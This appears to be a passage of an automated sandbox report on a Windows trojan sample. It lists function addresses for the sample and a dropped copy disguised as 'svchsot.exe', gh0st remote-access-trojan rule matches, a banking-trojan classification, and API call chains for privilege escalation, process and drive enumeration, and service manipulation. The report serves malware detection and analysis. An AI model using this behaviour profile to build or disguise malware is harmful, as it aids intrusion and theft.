          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1003D9900_2_1003D990
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100449900_2_10044990
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100329A00_2_100329A0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1001E9B00_2_1001E9B0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100419B00_2_100419B0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1003F9E00_2_1003F9E0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10055A0B0_2_10055A0B
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100322300_2_10032230
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1003B2300_2_1003B230
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1002F2400_2_1002F240
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10033A400_2_10033A40
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100692400_2_10069240
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1001F2500_2_1001F250
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1004D2500_2_1004D250
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10038A700_2_10038A70
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1003D2700_2_1003D270
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1003CA800_2_1003CA80
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10042A800_2_10042A80
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1005029F0_2_1005029F
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10031AA00_2_10031AA0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1002D2B00_2_1002D2B0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100392C00_2_100392C0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1001E2D00_2_1001E2D0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1003E2F00_2_1003E2F0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100572F00_2_100572F0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1001BB000_2_1001BB00
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1003A3000_2_1003A300
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10050B150_2_10050B15
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100243500_2_10024350
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1003EB500_2_1003EB50
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100423500_2_10042350
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100543680_2_10054368
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1005236B0_2_1005236B
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100433800_2_10043380
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1004B3A00_2_1004B3A0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10041BA00_2_10041BA0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10017BD00_2_10017BD0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10035BD00_2_10035BD0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1001D3E00_2_1001D3E0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1001BC000_2_1001BC00
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10018C100_2_10018C10
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100374100_2_10037410
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1002EC200_2_1002EC20
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10036C200_2_10036C20
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100564300_2_10056430
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1004C4400_2_1004C440
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1005544D0_2_1005544D
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100344500_2_10034450
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1003BC600_2_1003BC60
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1001DC800_2_1001DC80
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100364A00_2_100364A0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10040CA00_2_10040CA0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100354C00_2_100354C0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1002D4D00_2_1002D4D0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100175000_2_10017500
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10052D170_2_10052D17
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1003DD200_2_1003DD20
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100425200_2_10042520
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1004DD300_2_1004DD30
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100515470_2_10051547
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1003AD400_2_1003AD40
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10042D500_2_10042D50
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10041D600_2_10041D60
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10038D700_2_10038D70
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100395700_2_10039570
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1001EDA00_2_1001EDA0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1001E5B00_2_1001E5B0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10039DB00_2_10039DB0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10023DC00_2_10023DC0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10065DC00_2_10065DC0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100155CE0_2_100155CE
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1003C5F00_2_1003C5F0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1003D6000_2_1003D600
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100666200_2_10066620
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10067E300_2_10067E30
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10034E500_2_10034E50
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1004B6500_2_1004B650
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100406600_2_10040660
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10058E700_2_10058E70
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10064E800_2_10064E80
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10015EA00_2_10015EA0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100646B00_2_100646B0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10047EF00_2_10047EF0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10041F200_2_10041F20
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1001CF300_2_1001CF30
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1003B7300_2_1003B730
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100297500_2_10029750
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100537660_2_10053766
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10054F6A0_2_10054F6A
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100387700_2_10038770
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10051F790_2_10051F79
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10016F800_2_10016F80
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10044F800_2_10044F80
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10043F900_2_10043F90
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10037FA00_2_10037FA0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100427B00_2_100427B0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1002FFC00_2_1002FFC0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1001DFE00_2_1001DFE0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10036FE00_2_10036FE0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1002CFF00_2_1002CFF0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10045FF00_2_10045FF0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002D80032_2_1002D800
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003081032_2_10030810
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003901032_2_10039010
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1006881032_2_10068810
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001581D32_2_1001581D
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003582032_2_10035820
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003982032_2_10039820
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004002032_2_10040020
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003604032_2_10036040
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1005284132_2_10052841
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003A85032_2_1003A850
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003686032_2_10036860
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100418A032_2_100418A0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100138C032_2_100138C0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100430D032_2_100430D0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001D8F032_2_1001D8F0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002F90032_2_1002F900
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003311032_2_10033110
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003791032_2_10037910
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002392032_2_10023920
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002992032_2_10029920
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1005892032_2_10058920
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003116032_2_10031160
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003516032_2_10035160
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004396032_2_10043960
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004218032_2_10042180
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003D99032_2_1003D990
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004499032_2_10044990
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100329A032_2_100329A0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001E9B032_2_1001E9B0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100419B032_2_100419B0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003F9E032_2_1003F9E0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10055A0B32_2_10055A0B
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003223032_2_10032230
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003B23032_2_1003B230
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002F24032_2_1002F240
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10033A4032_2_10033A40
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1006924032_2_10069240
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001F25032_2_1001F250
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004D25032_2_1004D250
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10038A7032_2_10038A70
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003D27032_2_1003D270
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003CA8032_2_1003CA80
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10042A8032_2_10042A80
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1005029F32_2_1005029F
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10031AA032_2_10031AA0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002D2B032_2_1002D2B0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100392C032_2_100392C0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001E2D032_2_1001E2D0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003E2F032_2_1003E2F0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100572F032_2_100572F0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001BB0032_2_1001BB00
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003A30032_2_1003A300
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10050B1532_2_10050B15
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002435032_2_10024350
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003EB5032_2_1003EB50
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004235032_2_10042350
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1005436832_2_10054368
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1005236B32_2_1005236B
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004338032_2_10043380
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004B3A032_2_1004B3A0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10041BA032_2_10041BA0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10017BD032_2_10017BD0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10035BD032_2_10035BD0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001D3E032_2_1001D3E0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001BC0032_2_1001BC00
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10018C1032_2_10018C10
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003741032_2_10037410
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002EC2032_2_1002EC20
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10036C2032_2_10036C20
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1005643032_2_10056430
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004C44032_2_1004C440
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1005544D32_2_1005544D
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003445032_2_10034450
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003BC6032_2_1003BC60
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001DC8032_2_1001DC80
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100364A032_2_100364A0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10040CA032_2_10040CA0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100354C032_2_100354C0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002D4D032_2_1002D4D0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001750032_2_10017500
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10052D1732_2_10052D17
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003DD2032_2_1003DD20
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004252032_2_10042520
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004DD3032_2_1004DD30
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1005154732_2_10051547
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003AD4032_2_1003AD40
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10042D5032_2_10042D50
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10041D6032_2_10041D60
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10038D7032_2_10038D70
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003957032_2_10039570
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001EDA032_2_1001EDA0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001E5B032_2_1001E5B0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10039DB032_2_10039DB0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10023DC032_2_10023DC0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10065DC032_2_10065DC0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100155CE32_2_100155CE
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003C5F032_2_1003C5F0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003D60032_2_1003D600
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1006662032_2_10066620
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10067E3032_2_10067E30
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10034E5032_2_10034E50
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004B65032_2_1004B650
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1004066032_2_10040660
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10058E7032_2_10058E70
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10064E8032_2_10064E80
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10015EA032_2_10015EA0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100646B032_2_100646B0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10047EF032_2_10047EF0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10041F2032_2_10041F20
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001CF3032_2_1001CF30
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003B73032_2_1003B730
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002975032_2_10029750
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1005376632_2_10053766
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10054F6A32_2_10054F6A
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1003877032_2_10038770
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10051F7932_2_10051F79
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10016F8032_2_10016F80
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10044F8032_2_10044F80
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10043F9032_2_10043F90
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10037FA032_2_10037FA0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100427B032_2_100427B0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002FFC032_2_1002FFC0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1001DFE032_2_1001DFE0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10036FE032_2_10036FE0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1002CFF032_2_1002CFF0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10045FF032_2_10045FF0
          Source: ILQ18dgzMU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: dump.pcap, type: PCAPMatched rule: gh0st author = https://github.com/jackcr/
          Source: 00000000.00000002.4082870617.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: gh0st author = https://github.com/jackcr/
          Source: 00000000.00000003.3947674150.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: gh0st author = https://github.com/jackcr/
          Source: 00000000.00000003.3090838933.0000000002150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: gh0st author = https://github.com/jackcr/
          Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@64/4@6/1
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10012110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,0_2_10012110
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10012110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,32_2_10012110
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100084F0 GetLogicalDriveStringsA,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,lstrlen,GetDiskFreeSpaceExA,GetDriveTypeA,lstrlen,0_2_100084F0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle,0_2_100018A0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10019900 CoCreateInstance,SysFreeString,0_2_10019900
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100098B0 CloseHandle,CreateThread,??2@YAPAXI@Z,FindResourceA,LoadResource,LockResource,??3@YAXPAX@Z,0_2_100098B0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10010E20 OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,DeleteService,RegDeleteKeyA,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,OpenSCManagerA,OpenServiceA,LockServiceDatabase,OpenSCManagerA,OpenServiceA,LockServiceDatabase,OpenSCManagerA,OpenServiceA,ControlService,CloseServiceHandle,OpenSCManagerA,OpenServiceA,LockServiceDatabase,ChangeServiceConfigA,UnlockServiceDatabase,CloseServiceHandle,CloseServiceHandle,Sleep,0_2_10010E20
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
